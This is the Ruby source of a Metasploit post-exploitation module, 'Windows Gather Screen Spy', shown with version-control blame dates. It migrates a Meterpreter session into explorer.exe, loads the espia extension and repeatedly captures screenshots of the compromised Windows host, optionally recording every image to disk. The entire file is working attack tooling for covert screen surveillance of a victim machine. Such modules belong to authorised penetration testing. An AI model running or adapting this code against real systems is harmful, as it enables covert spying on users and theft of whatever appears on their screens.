2011-03-31 16:41:52 +00:00
|
|
|
##
|
|
|
|
# $Id$
|
|
|
|
##
|
|
|
|
|
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/framework/
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'rbconfig'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Post
|
|
|
|
def initialize(info={})
|
|
|
|
super( update_info(info,
|
2011-04-27 16:25:15 +00:00
|
|
|
'Name' => 'Windows Gather Screen Spy',
|
2011-10-17 03:49:49 +00:00
|
|
|
'Description' => %q{
|
2011-03-31 16:41:52 +00:00
|
|
|
This module will incrementally take screenshots of the meterpreter host. This
|
|
|
|
allows for screen spying which can be useful to determine if there is an active
|
2011-09-27 15:26:03 +00:00
|
|
|
user on a machine, or to record the screen for later data extraction.
|
2011-03-31 16:41:52 +00:00
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
2011-03-31 16:56:12 +00:00
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'Roni Bachar <roni.bachar.blog[at]gmail.com>', # original meterpreter script
|
2011-09-27 15:26:03 +00:00
|
|
|
'bannedit', # post module
|
|
|
|
'kernelsmith <kernelsmith /x40 kernelsmith /x2E com>', # record support
|
|
|
|
'Adrian Kubok' # better record file names
|
2011-03-31 16:56:12 +00:00
|
|
|
],
|
2011-03-31 16:41:52 +00:00
|
|
|
'Version' => '$Revision$',
|
|
|
|
'Platform' => ['windows'],
|
|
|
|
'SessionTypes' => ['meterpreter']
|
|
|
|
))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptInt.new('DELAY', [false, 'Interval between screenshots in seconds', 5]),
|
|
|
|
OptInt.new('COUNT', [false, 'Number of screenshots to collect', 60]),
|
|
|
|
OptString.new('BROWSER', [false, 'Browser to use for viewing screenshots', 'firefox']),
|
2011-09-27 15:26:03 +00:00
|
|
|
OptBool.new('RECORD', [false, 'Record all screenshots to disk',false])
|
2011-03-31 16:41:52 +00:00
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
|
|
|
host = session.tunnel_peer.split(':')[0]
|
|
|
|
screenshot = Msf::Config.install_root + "/data/" + host + ".jpg"
|
|
|
|
|
|
|
|
migrate_explorer
|
|
|
|
if session.platform !~ /win32|win64/i
|
|
|
|
print_error("Unsupported Platform")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
begin
|
|
|
|
session.core.use("espia")
|
|
|
|
rescue ::Exception => e
|
2011-09-27 15:26:03 +00:00
|
|
|
print_error("Failed to load espia extension (#{e.to_s})")
|
2011-03-31 16:41:52 +00:00
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
# here we check for the local platform and use default browsers
|
2011-10-17 03:49:49 +00:00
|
|
|
# linux is the one question mark firefox is not necessarily a
|
2011-03-31 16:41:52 +00:00
|
|
|
case ::Config::CONFIG['host'] # neat trick to get the local system platform
|
|
|
|
when /ming/
|
|
|
|
cmd = "start #{datastore['BROWSER']} \"file://#{screenshot}\""
|
|
|
|
when /linux/
|
2011-09-27 15:26:03 +00:00
|
|
|
cmd = "#{datastore['BROWSER']} file://#{screenshot}"
|
2011-03-31 16:41:52 +00:00
|
|
|
when /apple/
|
|
|
|
cmd = "open file://#{screenshot}" # this will use preview
|
|
|
|
end
|
|
|
|
|
|
|
|
begin
|
|
|
|
count = datastore['COUNT']
|
|
|
|
print_status "Capturing %u screenshots with a delay of %u seconds" % [count, datastore['DELAY']]
|
2011-09-27 15:26:03 +00:00
|
|
|
# calculate a sane number of leading zeros to use. log of x is ~ the number of digits
|
|
|
|
leading_zeros = Math::log(count,10).round
|
|
|
|
count.times do |num|
|
2011-03-31 16:41:52 +00:00
|
|
|
select(nil, nil, nil, datastore['DELAY'])
|
|
|
|
data = session.espia.espia_image_get_dev_screen
|
|
|
|
if data
|
2011-09-27 15:26:03 +00:00
|
|
|
if datastore['RECORD']
|
|
|
|
# let's write it to disk using non-clobbering filename
|
|
|
|
shot = Msf::Config.install_root + "/data/" + host + ".screenshot.%0#{leading_zeros}d.jpg" % num
|
|
|
|
ss = ::File.new(shot, 'wb')
|
|
|
|
ss.write(data)
|
|
|
|
ss.close
|
|
|
|
end
|
|
|
|
|
2011-03-31 16:41:52 +00:00
|
|
|
fd = ::File.new(screenshot, 'wb')
|
|
|
|
fd.write(data)
|
|
|
|
fd.close
|
|
|
|
end
|
|
|
|
system(cmd)
|
|
|
|
end
|
|
|
|
rescue ::Exception => e
|
|
|
|
print_error("Error taking screenshot: #{e.class} #{e} #{e.backtrace}")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
print_status("Screen Spying Complete")
|
|
|
|
::File.delete(screenshot)
|
|
|
|
end
|
|
|
|
|
|
|
|
def migrate_explorer
|
|
|
|
pid = session.sys.process.getpid
|
|
|
|
session.sys.process.get_processes.each do |p|
|
|
|
|
if p['name'] == 'explorer.exe' and p['pid'] != pid
|
|
|
|
print_status("Migrating to explorer.exe pid: #{p['pid']}")
|
|
|
|
begin
|
|
|
|
session.core.migrate(p['pid'].to_i)
|
|
|
|
print_status("Migration successful")
|
|
|
|
rescue
|
|
|
|
print_status("Migration failed.")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
2011-10-17 03:49:49 +00:00
|
|
|
end
|